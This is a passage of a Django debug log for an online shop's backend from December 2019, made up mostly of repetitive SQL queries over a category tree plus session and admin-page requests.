13:59:34,234 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:59:34,236 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:59:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 14:02:14,024 utils 4252 140031721535232 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T14:02:14.013699+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 18, 14, 2, 14, 13699, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-18 14:02:14,027 utils 4252 140031721535232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 14:02:14,060 utils 4252 140031721535232 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-18 14:02:14,069 utils 4252 140031721535232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T14:02:14.067686+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 14, 2, 14, 67686, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [18/Dec/2019 14:02:14] "GET /admin/ HTTP/1.0" 200 8208 DEBUG 2019-12-18 14:02:15,227 utils 4252 140031721535232 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T14:02:15.212991+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 18, 14, 2, 15, 212991, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-18 14:02:15,232 utils 4252 140031721535232 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 14:02:15,281 utils 4252 140031721535232 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-18 14:02:15,294 utils 4252 140031721535232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T14:02:15.292293+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 14, 2, 15, 292293, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [18/Dec/2019 14:02:15] "GET /admin/ HTTP/1.0" 200 8208 DEBUG 2019-12-18 14:02:21,907 utils 4252 140031721535232 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T14:02:21.898613+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 18, 14, 2, 21, 898613, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-18 14:02:21,911 utils 4252 140031721535232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 14:02:21,915 utils 4252 140031721535232 (0.002) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-18 14:02:21,919 utils 4252 140031721535232 (0.003) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-18 14:02:21,920 utils 4252 140031721535232 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-18 14:02:21,925 utils 4252 140031721535232 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-12-18 14:02:22,044 utils 4252 140031721535232 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T14:02:22.041654+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 14, 2, 22, 41654, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [18/Dec/2019 14:02:22] "GET /auth/user/ HTTP/1.0" 200 9542 DEBUG 2019-12-18 14:02:22,471 utils 4252 140031721535232 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T14:02:22.456474+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 18, 14, 2, 22, 456474, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-18 14:02:22,475 utils 4252 140031721535232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [18/Dec/2019 14:02:22] "GET /jsi18n/ HTTP/1.0" 200 3223 [18/Dec/2019 14:02:22] "GET /static/admin/css/changelists.css HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/jquery.init.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/core.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/urlify.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/actions.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/prepopulate.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 304 0 [18/Dec/2019 14:02:22] "GET /static/admin/img/search.svg HTTP/1.0" 200 458 [18/Dec/2019 14:02:22] "GET /static/admin/img/icon-no.svg HTTP/1.0" 200 560 [18/Dec/2019 14:02:23] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 304 0 [18/Dec/2019 14:02:23] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [18/Dec/2019 14:02:23] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 304 0 Not Found: /api/api-token-auth/ [18/Dec/2019 14:02:44] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6484 Not Found: /api/api-token-auth/ [18/Dec/2019 14:03:07] "GET /api/api-token-auth/ HTTP/1.0" 404 6480 [18/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 14:10:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 14:12:10,757 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 14:12:10,768 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 14:12:10,773 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 14:12:10,776 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 14:12:10,780 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 14:12:10,783 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 14:12:10,785 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 14:12:10,789 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 14:12:10,793 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 14:12:10,797 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 14:12:10,801 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 14:12:10,805 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 14:12:10,807 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 14:12:10,810 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 14:12:10,814 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 14:12:10,816 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 14:12:10,819 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 14:12:10,821 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 14:12:10,823 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 14:12:10,827 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 14:12:10,830 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 14:12:10,832 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 14:12:10,834 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 14:12:10,837 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 14:12:10,840 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 14:12:10,843 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 14:12:10,845 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 14:12:10,848 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 14:12:10,851 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 14:12:10,854 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 14:12:10,859 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 14:12:10,863 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 14:12:10,865 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 14:12:10,868 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 14:12:10,872 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 14:12:10,876 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 14:12:10,878 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 14:12:10,881 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 